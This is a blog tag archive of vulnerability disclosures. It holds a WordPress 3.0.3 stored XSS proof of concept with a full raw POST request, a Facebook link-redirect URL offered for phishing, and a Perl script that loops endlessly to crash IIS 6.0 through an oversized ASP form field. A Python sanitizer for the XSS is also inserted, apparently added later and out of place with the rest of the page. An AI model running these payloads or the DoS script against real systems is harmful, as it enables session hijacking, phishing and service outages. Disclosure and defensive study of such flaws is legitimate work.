Tag archive: Vulnerability

WordPress 3.0.3 Stored XSS

Software: wordpress.org

Version: 3.0.3

Affected browsers: IE7, IE6, NS8.1

Author: Saif

XSS in the post page using a CSS style attribute

PoC: a post containing "<IMG STYLE="xss:expression(alert('XSS'))">"

Or you can use a raw request to plant the parameter carrying the XSS:


POST /wordpress/wp-admin/post.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://127.0.0.1/wordpress/wp-admin/post.php?post=145&action=edit&message=1
Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C17562b2ebe444d17730a2bbee6ceba99; wp-settings-time-1=1293196695; wp-settings-time-2=1293197912; wp-settings-1=m3%3Dc%26editor%3Dhtml; wp-settings-2=editor%3Dhtml%26m5%3Do; wp-settings-time-3=1293462654; wp-settings-3=editor%3Dhtml; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C7437e30b3242f455911b2b60daf35e48; PHPSESSID=a1e7d9fcce3d072b31162c4acbbf1c37; kaibb4443=80bdb2bb6b0274393cdd1e47a67eabbd; AEFCookies2525[aefsid]=kmxp4rfme1af9edeqlsvtfatf4rvu9aq
Content-Type: application/x-www-form-urlencoded
Content-Length: 1655

_wpnonce=aad1243dc1&_wp_http_referer=/wordpress/wp-admin/post.php?post=145&action=edit&message=1&user_ID=3&action=editpost&originalaction=editpost&post_author=3&post_type=post&original_post_status=publish&referredby=http://127.0.0.1/wordpress/wp-admin/post.php?post=145&action=edit&message=1&_wp_original_http_referer=http://127.0.0.1/wordpress/wp-admin/post.php?post=145&action=edit&message=1&post_ID=145&autosavenonce=e35a537141&meta-box-order-nonce=718e35f130&closedpostboxesnonce=0203f58029&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=12&jj=27&aa=2010&hh=15&mn=31&ss=55&hidden_mm=12&cur_mm=12&hidden_jj=27&cur_jj=27&hidden_aa=2010&cur_aa=2010&hidden_hh=15&cur_hh=16&hidden_mn=31&cur_mn=02&original_publish=Update&save=Update&post_category[]=0&post_category[]=1&tax_input[post_tag]=&newtag[post_tag]=&post_title=&samplepermalinknonce=ffcbf222eb&content=<IMG+STYLE="xss:expression(alert('XSS'))">&excerpt=&trackback_url=&meta[108][key]=_edit_last&_ajax_nonce=257f6f6ad9&meta[108][value]=3&meta[111][key]=_edit_lock&_ajax_nonce=257f6f6ad9&meta[111][value]=1293465765&meta[116][key]=_encloseme&_ajax_nonce=257f6f6ad9&meta[116][value]=1&meta[110][key]=_wp_old_slug&_ajax_nonce=257f6f6ad9&meta[110][value]=&metakeyselect=#NONE#&metakeyinput=&metavalue=&_ajax_nonce-add-meta=61de41e725&advanced_view=1&comment_status=open&ping_status=open&add_comment_nonce=c32341570f&post_name=145
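A defensive counterpart to the PoC above, added here as an illustration and not code from WordPress or the post's author: a style-attribute filter that drops expression() and the other CSS constructs the affected legacy browsers treat as script before stored post content is rendered, fed with the content field of a constructed excerpt of the captured request body (DANGEROUS_STYLE, StyleSanitizer and SAMPLE_BODY are names chosen for this example).

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Style constructs the affected legacy browsers (IE 6/7, Netscape 8) execute as script.
# Illustrative filter added here; it is not WordPress's own kses/safecss code.
DANGEROUS_STYLE = re.compile(
    r"expression\s*\(|behaviou?r\s*:|-moz-binding|url\s*\(\s*['\"]?\s*(javascript|vbscript):",
    re.IGNORECASE)

def clean_style(style):
    """Keep only the CSS declarations that contain no script-capable construct."""
    decls = [d.strip() for d in style.split(";") if d.strip()]
    return "; ".join(d for d in decls if not DANGEROUS_STYLE.search(d))

class StyleSanitizer(HTMLParser):
    """Re-emits markup with style attributes filtered; attribute values are re-escaped, comments dropped."""
    def __init__(self):
        super().__init__(convert_charrefs=False)  # entities are re-emitted, not decoded into data
        self.out = []
    def handle_starttag(self, tag, attrs):
        parts = [tag]
        for name, value in attrs:
            if name.lower() == "style":
                value = clean_style(value or "")
                if not value:
                    continue  # nothing safe left, drop the attribute
            parts.append(name if value is None else f'{name}="{html.escape(value, quote=True)}"')
        self.out.append("<" + " ".join(parts) + ">")
    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")
    def handle_data(self, data):
        self.out.append(data)
    def handle_entityref(self, name):
        self.out.append(f"&{name};")
    def handle_charref(self, name):
        self.out.append(f"&#{name};")

def sanitize_html(markup):
    parser = StyleSanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)

def sanitize_post_content(form_body):
    """Extract the `content` field of a post.php form body and sanitize it."""
    return sanitize_html(parse_qs(form_body).get("content", [""])[0])

# Constructed excerpt of the captured request body; the content field is the page's payload.
SAMPLE_BODY = "post_ID=145&content=<IMG+STYLE=\"xss:expression(alert('XSS'))\">&excerpt="
```

Because HTMLParser decodes attribute values before they reach the filter, an entity-encoded "expression" is still caught; comments are dropped, so IE conditional comments cannot smuggle markup past the check either.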

Facebook Link Redirect

Server: http://www.facebook.com

Risk: low

Author: SpecTrum_Bill

Bypasses Facebook's link protector, making some kind of phishing attack possible.

PoC: http://www.facebook.com/l.php?u=https://unauthorizedaccess.wordpress.com&h=5a3db

Microsoft IIS 6.0 ASP Stack Overflow (Stack Exhaustion) DoS

Affected product: Microsoft IIS 6.0
Exploit tested on: Windows Server 2003 SP2

Details:

<% Dim variable
   variable = Request.Form("FOOBAR") %>

The form field read into the variable supports a limit of 40000 characters; if more than that is sent, it will crash:

PoC Exploit

# IIS 6.0 ASP DoS PoC
# usage: perl IISdos.pl <host> <script.asp>
use strict;
use warnings;
use IO::Socket;

$| = 1;    # unbuffered output so the progress dots show up immediately
my ($host, $script) = @ARGV;
die "usage: perl IISdos.pl <host> <script.asp>\n" unless defined $host && defined $script;

while (1) {
    my $sock = IO::Socket::INET->new(PeerAddr => $host,
                                     PeerPort => 'http(80)',
                                     Proto    => 'tcp')
        or die "connect to $host failed: $@\n";
    # body far beyond the 40000-character limit mentioned above
    my $write = "C=A&" x 40000;
    print $sock "HEAD /$script HTTP/1.1\r\nHost: $host\r\n"
        . "Connection: Close\r\nContent-Type: application/x-www-form-urlencoded\r\n"
        . "Content-Length: " . length($write) . "\r\n\r\n" . $write;
    print ".";
    while (<$sock>) {
        print;
    }
}

This is the kind of thing that makes me like Apache ;o)

Stack Overflow on the Windows platform (pt-br)

Hunting for BOFs and SOFs in Linux environments is relatively easy; on Windows it is another story!

By bro: co1ote